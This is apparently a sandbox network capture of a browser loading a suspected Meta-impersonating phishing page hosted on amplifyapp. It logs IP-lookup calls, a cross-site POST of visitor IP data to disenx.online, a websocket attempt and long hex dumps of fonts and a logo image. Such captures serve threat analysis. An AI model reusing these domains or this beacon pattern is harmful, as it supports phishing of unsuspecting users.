                                          2024-03-25 19:07:20 UTC631OUTGET /?format=json HTTP/1.1
                                          Host: api.ipify.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Accept: application/json, text/plain, */*
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC249INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Content-Type: application/json
                                          Content-Length: 22
                                          Connection: close
                                          Access-Control-Allow-Origin: *
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 86a12eef6d31083e-IAD
                                          2024-03-25 19:07:20 UTC22INData Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                          Data Ascii: {"ip":"102.165.48.43"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.649722172.67.74.1524435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC349OUTGET /?format=json HTTP/1.1
                                          Host: api.ipify.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:21 UTC217INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:21 GMT
                                          Content-Type: application/json
                                          Content-Length: 22
                                          Connection: close
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 86a12ef05a2a0834-IAD
                                          2024-03-25 19:07:21 UTC22INData Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                          Data Ascii: {"ip":"102.165.48.43"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.649724198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC684OUTPOST /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          Content-Length: 9
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Accept: application/json, text/plain, */*
                                          Content-Type: application/json
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC9OUTData Raw: 7b 22 69 70 22 3a 22 22 7d
                                          Data Ascii: {"ip":""}
                                          2024-03-25 19:07:21 UTC358INHTTP/1.1 200 OK
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          content-type: text/html; charset=UTF-8
                                          cache-control: no-cache, private
                                          x-ratelimit-limit: 60
                                          x-ratelimit-remaining: 59
                                          access-control-allow-origin: *
                                          content-length: 0
                                          date: Mon, 25 Mar 2024 19:07:21 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.64972334.240.119.524435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC590OUTGET /app/0d3b34df0b6b9220c260?protocol=7&client=js&version=8.0.2&flash=false HTTP/1.1
                                          Host: ws-eu.pusher.com
                                          Connection: Upgrade
                                          Pragma: no-cache
                                          Cache-Control: no-cache
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Upgrade: websocket
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-WebSocket-Version: 13
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Sec-WebSocket-Key: SQ76rLgsFcIl2RzvyhmqlQ==
                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                          2024-03-25 19:07:21 UTC128INHTTP/1.1 426 Upgrade Required
                                          Date: Mon, 25 Mar 2024 19:07:21 GMT
                                          Content-Length: 0
                                          Connection: close
                                          Upgrade: websocket


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.649726172.64.133.224435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC630OUTGET /s/14883/Montserrat-Regular.woff HTTP/1.1
                                          Host: fonts.cdnfonts.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: font
                                          Referer: https://fonts.cdnfonts.com/css/montserrat?styles=17402
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:21 UTC727INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:21 GMT
                                          Content-Type: font/woff
                                          Content-Length: 111676
                                          Connection: close
                                          Last-Modified: Sat, 05 Feb 2022 02:00:37 GMT
                                          ETag: "1b43c-5d73bbbd1bfb5"
                                          Cache-Control: max-age=2678400
                                          CF-Cache-Status: HIT
                                          Age: 1440
                                          Accept-Ranges: bytes
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EprVuVKrAhmPb4oiTkqXGa5hbDx%2B43eJGuG5r2XZMWfn99uq7KdXx7s4mIef9PAK7z0F1yuYPtOQWOEb1LQm%2Bpaz7kppMUTppH%2FMHE8RjpgN6N1fhwrlc8m6gq3u4gW6ZoIvD8%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Access-Control-Allow-Origin: *
                                          Server: cloudflare
                                          CF-RAY: 86a12ef43ba6420b-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-03-25 19:07:21 UTC642INData Raw: 77 4f 46 46 00 01 00 00 00 01 b4 3c 00 12 00 00 00 04 02 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 53 49 47 00 01 b4 34 00 00 00 08 00 00 00 08 00 00 00 01 47 44 45 46 00 00 01 94 00 00 01 ba 00 00 02 90 cd 36 cf 62 47 50 4f 53 00 00 03 50 00 00 70 15 00 01 34 a4 02 94 9b 06 47 53 55 42 00 00 73 68 00 00 1b 25 00 00 3d 3c 78 30 6d ea 4f 53 2f 32 00 00 8e 90 00 00 00 4f 00 00 00 60 55 a5 a3 42 63 6d 61 70 00 00 8e e0 00 00 09 86 00 00 0d 28 a2 83 b2 15 63 76 74 20 00 01 ac b8 00 00 00 5c 00 00 00 e4 2f 52 15 48 66 70 67 6d 00 01 ad 14 00 00 06 62 00 00 0d 6d 4d 24 8e 7c 67 61 73 70 00 01 ac b0 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 98 68 00 00 d6 1f 00 01 e6 04 77 2a b0 79 68 65 61 64 00 01 6e 88 00 00 00
                                          Data Ascii: wOFF<DSIG4GDEF6bGPOSPp4GSUBsh%=<x0mOS/2O`UBcmap(cvt \/RHfpgmbmM$|gaspglyfhw*yheadn
                                          2024-03-25 19:07:21 UTC1369INData Raw: 51 1d c5 7b 7a 1f c7 74 1c f3 9a c7 82 16 70 42 27 b0 a8 4f f1 99 4e e1 0b 7d 8b 65 2d e3 ac 7e c4 4f fa 15 97 74 09 2b 5a c1 aa 56 f1 87 fe c4 5f fa 07 ff e9 7f 71 46 a8 56 87 f5 b6 06 d7 da 3a 5c 6f 8d b8 d3 76 e1 6e db 83 09 4b 60 93 35 63 8b 25 31 65 29 4c 5b 1a 0f 59 1b 1e b1 a3 d8 6e 1d d8 69 5d d8 6d 27 b1 c7 7a b0 d7 7a f1 8c 9d c3 f3 76 19 6f d8 2d 1c b0 01 1c b4 41 cc 5a 0e ef da 18 8e db 23 7c 6c 53 58 b2 12 ce 58 19 e7 ec bd b8 9a 62 4d 51 5c 74 b1 4b 42 ec 8f 59 cc c5 11 71 e2 65 05 b7 56 7c 5c 15 1b 70 63 dc 24 2e 6e 8e 5b 70 6b 3c c8 49 c7 56 3c 1c 3b b1 3f 5e c2 ab 31 2b 7e 19 a3 1d 6d ca 00 00 78 01 ed 9d 7b 9c 55 55 dd ff d7 de 67 ef 3d 17 e6 7e 65 86 e1 38 17 c0 71 1c 60 c4 19 ae c3 0c 8c 38 22 32 88 e4 2d 23 33 13 33 31 1f 32 f3 51 33
                                          Data Ascii: Q{ztpB'ON}e-~Ot+ZV_qFV:\ovnK`5c%1e)L[Yni]m'zzvo-AZ#|lSXXbMQ\tKBYqeV|\pc$.n[pk<IV<;?^1+~mx{UUg=~e8q`8"2-#3312Q3
                                          2024-03-25 19:07:21 UTC1369INData Raw: f6 19 ca a6 f2 39 76 29 ae 8a 91 b4 af d3 fe d4 5b 63 9d 11 e9 b2 29 fd 61 ae 33 df 3e 53 da eb ac 4a 8e 38 d8 df c7 75 92 cb fe a4 b1 75 bd af 2c 7d 6d 99 11 c6 4e a5 c8 f5 54 0f 45 26 29 e5 cc 50 2d 7e 5a fb dc 27 3a 23 f7 ad 75 97 a7 ef 5b e6 05 29 fd c7 95 67 ca 4e 22 eb 1b 7d 64 c1 ec 5e 03 a7 ed db c7 53 28 33 c3 12 94 cf 49 bc 9d b8 2b e9 09 c5 cc ba 13 cb a2 1e 77 ad 94 cd f5 47 1e 55 36 6c 17 35 70 0c 3b 9c 99 d8 da c3 cb be 98 fa 8c 3d 3c 07 28 d1 2d b9 b2 f7 18 25 3e 40 ae 41 ae 4c 79 5f 64 f6 b0 7d be be d6 87 16 6f b4 ef de fd fa 54 5b b3 d4 dd 47 e9 fa 14 36 7e 23 fc e0 40 3e d8 db fd 6d 67 62 4e f4 1b b2 7b 7d c1 ef 24 fe 19 e2 c4 66 7c cc 95 c9 e3 4a 8b d4 bb d9 89 75 1a e3 8d 61 c2 9f 6d 25 cf 52 f3 45 9d c9 0b 8f 9b 4c 38 8d ab f1 df 8a
                                          Data Ascii: 9v)[c)a3>SJ8uu,}mNTE&)P-~Z':#u[)gN"}d^S(3I+wGU6l5p;=<(-%>@ALy_d}oT[G6~#@>mgbN{}$f|Juam%REL8
                                          2024-03-25 19:07:21 UTC1369INData Raw: c9 e5 a6 62 f0 d4 68 c5 96 f6 79 22 2b e8 b3 3b b4 45 77 80 ee 5f d5 0c 7b c4 5a b8 cc 6e 69 ec 1a 59 cd f5 6d ad c9 40 06 c6 a5 e6 12 1d 2b 33 86 1e 70 68 bd 6d 81 19 01 fb fe 65 1e ee e7 47 1e 78 ab fc c4 62 76 96 d6 24 56 e8 fb a6 c9 a4 e5 2b c3 f3 09 e9 37 9a 95 09 b8 f9 56 69 df 55 4b bc a8 f5 62 6b f6 aa 01 b6 80 94 ea 4e 8a 5a c9 7d 43 9f 7d 92 9f 12 6b a5 6b ff 3e bd af 63 7f 57 cd 6d ff ba 59 51 b4 a2 33 ed 1d be 91 78 09 bb f6 7c 62 3b bb 39 5b 12 dd 58 b9 1d d1 fd 97 08 79 42 b8 66 2f b9 29 4d 8b 3e a0 46 7c a5 dd bf d1 55 45 6c 95 3a a8 33 59 6b 84 76 a1 fb 10 56 84 91 fb bf f7 71 16 5c cb 7d 78 a2 99 67 56 98 f5 4e a6 33 dc 39 c3 b9 ce 79 c2 d9 e8 56 b9 93 dc 1b dc e5 b1 fa d8 79 b1 05 5e e0 35 79 a7 78 57 78 f7 7a dd be eb 37 fa 27 fa 97 f9
                                          Data Ascii: bhy"+;Ew_{ZniYm@+3phmeGxbv$V+7ViUKbkNZ}C}kk>cWmYQ3x|b;9[XyBf/)M>F|UEl:3YkvVq\}xgVN39yVy^5yxWxz7'
                                          2024-03-25 19:07:21 UTC1369INData Raw: 7b 26 5f 7d bb 19 ac af f0 a6 a8 9c 7d ef 93 a2 73 73 14 f4 61 af 32 7b f7 aa aa 89 6a da 0a 7a 8b 39 c5 95 b3 3a dd 4d 2e d6 b4 79 fa a2 8c 3e 96 d5 61 26 ef 8c ae d1 0d fb 88 32 ab c8 2d 1d 6b 9e 2e 3d b4 5d b9 b7 9b 7a ee 0b e6 28 b9 de da b3 fa a1 9c bd e6 eb ff 5e 63 f2 08 eb c5 ef 1d d0 6e c3 1a a5 95 6a 97 1f ad 03 6e a4 b6 12 d6 3f 5d 76 50 e3 e1 fd a5 36 2d 4e 3c c4 dd bd 85 fd 9c bc c4 3a fd 06 92 1b 55 3a 3f bc 5b 79 0e fc 79 53 64 aa 4c bd b0 78 90 ae e9 6f ca 9b 41 ef ac 53 4d eb a8 6b 03 cf 67 bc a9 96 ba dc bd 5b b4 f6 fb aa 6c 73 37 f7 29 f7 b5 ce a6 d8 47 16 9e fc ac 0b bd 27 99 c0 1e 6e 53 5a 89 a5 e6 6e 50 da ba 4f db fa 0a 7d 6a ad 12 ea 7a 8b d4 46 8d 09 f6 68 61 62 b9 fa 62 69 e2 7f 98 83 ef 4a ae 64 7e fe 2d 2c ab df e5 3c 67 98 cf
                                          Data Ascii: {&_}}ssa2{jz9:M.y>a&2-k.=]z(^cnjn?]vP6-N<:U:?[yySdLxoASMkg[ls7)G'nSZnPO}jzFhabbiJd~-,<g
                                          2024-03-25 19:07:21 UTC1369INData Raw: 40 75 3e 97 f8 87 da f6 bc 7e df 97 e5 7a 57 f3 93 f9 a5 1a d7 60 29 d6 c9 02 64 5b 51 fe 86 1e ef 8b 15 f2 b7 b4 aa 19 4e 0e bb 79 97 67 7d d6 09 bd 45 de d5 6a d7 83 3c a9 f6 06 ed 5a c4 8c 7d 91 3e 7d 3b f1 02 ab 1b e2 0c d8 05 a1 68 56 b9 fc eb 15 9c 57 65 f4 d4 bd ea 5c 11 bd bb 11 67 76 ac 35 4d ac b0 bc 22 a9 5c bc 35 f2 86 d2 7b 11 eb fa b3 2c cc 26 d6 e2 c4 d9 69 89 38 88 f8 f0 d6 1e cf 06 ba bd 67 24 b9 d7 da 77 36 35 ae 8d 6c f7 4e 6c d6 5b 42 b2 0c 3c 85 fb 96 c6 f1 d7 89 65 d2 3f a2 33 76 6b ed fc a7 5c a3 ce a0 d1 58 a6 f5 97 85 6a cb 8b 92 7f 34 d5 bb c7 f1 37 26 9f 27 dd 1f d5 38 96 24 57 21 78 6f d7 d7 f5 0f d3 15 bd 42 eb ff ae b4 18 bf d5 cd ba fa 4b d2 bc ae b1 5f 17 ad e1 3d ae f2 4b c2 75 f6 c4 1f d5 9f 6f a8 8e 07 e5 47 54 13 f5 ad
                                          Data Ascii: @u>~zW`)d[QNyg}Ej<Z}>};hVWe\gv5M"\5{,&i8g$w65lNl[B<e?3vk\Xj47&'8$W!xoBK_=KuoGT
                                          2024-03-25 19:07:21 UTC1369INData Raw: 68 3c 8f 60 fd be 4e d7 b7 8a 3d 16 8d 0c cf 5d e8 1d 72 46 36 3b ec 4b 78 d4 1a f3 c9 7f b2 35 a2 75 30 41 e6 2e a3 fb ef f8 64 7e f2 57 6e ad b8 f6 fe 77 65 4a 3e 89 7d 3d ad e5 6c c5 bf c4 e1 d7 49 dd af 4c 1c 50 22 fd a0 70 5e 90 4a c2 1d 2f 62 1a f1 09 fe ad a7 8f fb 53 65 fe 2f 7c 9a f7 2b 57 a7 7a 2a 83 75 45 d6 b9 64 5f 16 f2 de 5f 2b 2b a9 ae d6 f8 b2 a5 e9 66 9f e3 50 53 9e f4 df 26 97 b1 df 8f 0f 8c f6 df fb c9 c7 32 a6 fb 94 7d 42 b3 32 d3 46 24 34 b6 ee 23 39 6b f4 a5 ef 19 d1 1e 77 a6 1f cd 96 6a 53 86 2d 35 c6 b7 8e 7e d4 f7 ae 7c e2 55 79 a1 45 7f 68 c1 43 4f 18 c7 1c c5 cc 55 04 c1 7b e2 f5 a6 16 26 98 ad 35 a2 ad 20 f9 0f e9 03 a1 a2 68 d5 e1 6f f2 27 39 a6 88 67 5e a7 9a ba f0 d9 3c a1 2a fe 05 9c 38 7e be 45 a5 17 aa 54 11 a9 44 df 41
                                          Data Ascii: h<`N=]rF6;Kx5u0A.d~WnweJ>}=lILP"p^J/bSe/|+Wz*uEd__++fPS&2}B2F$4#9kwjS-5~|UyEhCOU{&5 ho'9g^<*8~ETDA
                                          2024-03-25 19:07:21 UTC1369INData Raw: b7 a4 2a 3c 8a 15 62 4e 45 cf ca 66 53 42 ef 83 f2 eb ef 35 9a c8 37 13 18 6d cf f6 06 ff d2 67 f0 3e 8e f7 b7 b0 cf f7 40 3e fe be 9f 3d 64 46 2c b0 df 21 4c bc d9 d3 b7 e2 2b d6 45 fd f6 7c f2 29 31 24 7c 20 fa b7 3c 57 d9 6f 7b 88 5b 3e 9b 62 ac 5e ff 10 23 7c 0f b5 2f b0 77 99 79 76 f8 9f c9 d6 f6 b0 87 6a ad 65 0f 37 e1 23 42 9b b7 36 69 0f 79 1b 60 1b ba d5 c4 ad eb 34 07 97 b3 eb ff be 6a 5c ab 3a 36 0b ad ea 1d 23 e2 c1 d6 86 6f f7 29 f5 b6 f0 f5 c8 0c cb fb a4 9a 0b 7e b4 6f 5c cf 9b 7b e4 d1 2f ab 2b cc dc b8 da 20 3b 4f 0b 53 b3 da 78 c4 46 57 1d 50 84 af 37 8f 54 f7 06 ae 4e 96 9f f7 e4 fa 1b 47 3e e0 8d e8 09 8f ed 6a 45 29 ef 42 e8 9d 0e 49 5f bd 53 6d aa 89 a9 4a d9 e9 50 9e 68 ef 32 1f db ed 12 fb 6f e6 df a9 58 a5 68 f8 3d a5 bf a9 e5 b4
                                          Data Ascii: *<bNEfSB57mg>@>=dF,!L+E|)1$| <Wo{[>b^#|/wyvje7#B6iy`4j\:6#o)~o\{/+ ;OSxFWP7TNG>jE)BI_SmJPh2oXh=
                                          2024-03-25 19:07:21 UTC1369INData Raw: 32 8f 50 73 a4 19 ad 34 39 77 5c 6e e7 ff 5e 2f bf 3d 30 39 a7 ed 46 a7 e6 9e 6c e9 cf 48 85 f9 eb 6c a5 59 b9 17 e4 5e 02 de dd e6 dc cb f5 f7 55 4a d7 44 f9 6e 90 b4 cb dd 1c fd de 9a 3b 37 f7 9e 08 3f 90 fb 48 ee 63 56 9e 85 3d ca 3c db fb 7a 73 5f ca 7d 7e 9f 63 61 f5 6d ee ca dc 65 fc ae 55 da 88 ce ee 4f 70 ee bb 49 6c f7 e7 fe f4 6d ee 8e 62 2f 2f 50 32 4a 39 c9 6b cc 2b b2 fb 56 7f f7 55 1a a0 14 ef dd cf 79 4d 79 0d 49 c4 5f c3 6d 8c 6c 55 ea 10 b2 31 7d 98 37 91 3e b4 fa a1 d7 75 59 f7 8f 35 17 c0 79 53 a2 3a 8f 57 3a 05 6c dd ff d1 b1 d3 2c 7c a6 85 cf d9 d3 e7 79 e7 59 fa 0b 93 f7 39 f8 52 30 63 97 77 45 72 ec ec 71 b4 f5 e4 bf da aa e7 5a 0b df 18 21 e6 a9 a5 bf 85 3e b4 e7 32 f7 64 de ed 7b ee c9 bc bb ac 51 ac dd 83 39 76 af 35 d7 ac 7a ec
                                          Data Ascii: 2Ps49w\n^/=09FlHlY^UJDn;7?HcV=<zs_}~cameUOpIlmb//P2J9k+VUyMyI_mlU1}7>uY5yS:W:l,|yY9R0cwErqZ!>2d{Q9v5z
                                          2024-03-25 19:07:21 UTC1369INData Raw: a4 70 d8 3f e6 6a f7 01 e5 3f 19 cd 93 ee 85 92 df 67 7d ed 9f d4 7c 04 f5 9c 9f 1c 77 fa bc 15 dc ca d1 6f 08 4b d2 aa 07 39 5a 6e 7c 49 ea 77 72 c9 73 22 35 ff 8f ec 90 da 40 cd 3b d0 ff 81 3c f3 55 4a 7a e7 0c ae 77 35 23 fe 63 c9 6e 8e 2e 22 e7 70 6a 38 33 89 93 92 3c 3f 47 1a e4 f1 ba 13 25 c1 63 91 47 20 63 c8 cc f0 a8 24 98 31 cd 03 df 84 fc 23 e7 6a a7 e6 e7 85 25 c1 9d 48 7a db 6d 46 7f 24 57 5a 24 29 4c 3d 87 80 4f 44 5f 46 9e 3b b1 63 49 0b 9f c9 d5 7d 97 b3 4f 41 33 56 52 58 1a d9 0d 37 8f 3c d7 4a 73 34 47 8f 90 14 a6 ce 46 f0 02 64 63 52 c3 19 1b 69 f3 91 dc ab a7 73 f4 04 ea f9 41 b2 66 72 7e 0f 79 34 39 57 83 9b 12 e1 7d 75 ab 9b 1b e2 48 5e 4f 3d 48 72 4e 89 e4 fd d4 20 9c 5c eb fc 54 d5 f1 97 ef 59 eb 6c be eb 80 92 d7 7c 2f bf 1f 45 f2
                                          Data Ascii: p?j?g}|woK9Zn|Iwrs"5@;<UJzw5#cn."pj83<?G%cG c$1#j%HzmF$WZ$)L=OD_F;cI}OA3VRX7<Js4GFdcRisAfr~y49W}uH^O=HrN \TYl|/E


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.649725198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC559OUTOPTIONS /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          Accept: */*
                                          Access-Control-Request-Method: POST
                                          Access-Control-Request-Headers: content-type
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:21 UTC473INHTTP/1.1 204 No Content
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          cache-control: no-cache, private
                                          access-control-allow-origin: *
                                          vary: Access-Control-Request-Method, Access-Control-Request-Headers
                                          access-control-allow-methods: POST
                                          access-control-allow-headers: content-type
                                          access-control-max-age: 0
                                          content-type: text/html; charset=UTF-8
                                          date: Mon, 25 Mar 2024 19:07:21 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.649727172.67.74.1524435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC349OUTGET /?format=json HTTP/1.1
                                          Host: api.ipify.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:21 UTC217INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:21 GMT
                                          Content-Type: application/json
                                          Content-Length: 22
                                          Connection: close
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 86a12ef52c0f29b8-IAD
                                          2024-03-25 19:07:21 UTC22INData Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                          Data Ascii: {"ip":"102.165.48.43"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.64972813.249.39.804435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:21 UTC413OUTGET /img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:22 UTC524INHTTP/1.1 200 OK
                                          Content-Type: image/png
                                          Content-Length: 73614
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:22 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "7fe0c84197452b900619714dd637e85c"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 8fc9659fc06389e49927f68638e9bc94.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: FaKlbLEDsu-UGwGMP-iEKYejTLj_rkcf8Jr-beJs3Yi7DHfiWnhLVw==
                                          2024-03-25 19:07:22 UTC8949INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0a 00 00 00 02 04 08 06 00 00 00 d5 2a 77 a9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da ec dd 77 78 5b e5 d9 c7 f1 df 7d 24 8f ec b0 12 b0 65 67 10 46 22 27 10 cb 81 06 68 49 81 b6 94 d1 1d 3a 28 33 83 d1 42 81 b2 5a 20 51 c2 86 b4 94 52 56 12 a0 40 27 e9 a6 a5 1b 28 5d 8c 38 50 88 13 28 23 71 e2 84 5d 32 80 38 b6 74 ee f7 8f d0 be b4 05 1a cb 96 74 24 7d 3f d7 e5 ab 40 21 b6 bf 47 3a 3a 92 6e 3d 8f 09 40 6e a6 3d d5 24 ab da 5d 0a 93 32 6b 94 6b a4 a4 6d 64 36 50 ae 01 92 f7 93 54 23
                                          Data Ascii: PNGIHDR*wgAMAa cHRMz&u0`:pQ<bKGDIDATxwx[}$egF"'hI:(3BZ QRV@'(]8P(#q]28tt$}?@!G::n=@n=$]2kkmd6PT#
                                          2024-03-25 19:07:22 UTC8949INData Raw: fa 9e a4 18 e9 73 3e 6f 3d a3 20 dc 57 e9 aa 7b 69 51 a6 d2 35 8f ca ab 26 c9 c4 31 2e 8c 1a 79 70 ab d2 5e 4d 0a 00 28 5d 2e 1d d5 38 be 39 45 09 a0 bc 8c dc 73 cf a1 26 3b 9f 12 00 00 00 00 00 00 c0 ff c6 00 e0 3b 99 d1 7e 8e a4 dd 08 51 4e 2c 2b d3 8f 35 28 d8 41 0b 1a 0f d1 55 0d ff a8 e8 1c 69 0b 75 d3 88 3b b5 70 c4 fb 24 b5 c8 74 bb a4 0c b7 93 8a 31 56 61 fc fb 9a ea f9 1d ca bb dc 07 c9 62 3f 92 34 94 e4 39 bb 5f 1e 9b ac 0b 6a 96 93 a2 ec cf cb 2f 29 8c 7f 40 b2 9b 88 51 10 13 65 19 de 58 06 80 d2 16 84 a1 5d 49 06 a0 bc 64 ba e3 5f 96 b4 1d 25 00 00 00 00 00 00 80 ff 8d 01 c0 b7 f3 f9 95 a3 14 fa c5 84 28 13 5b b6 fa fd ae d6 bf 3a 54 0b 46 7e ac e2 07 ff de ca c2 11 ad 5a 30 e2 68 79 76 8c a4 af 49 ea 24 4a 45 f8 80 86 b6 e7 ef 0d 53 77 d3 e6
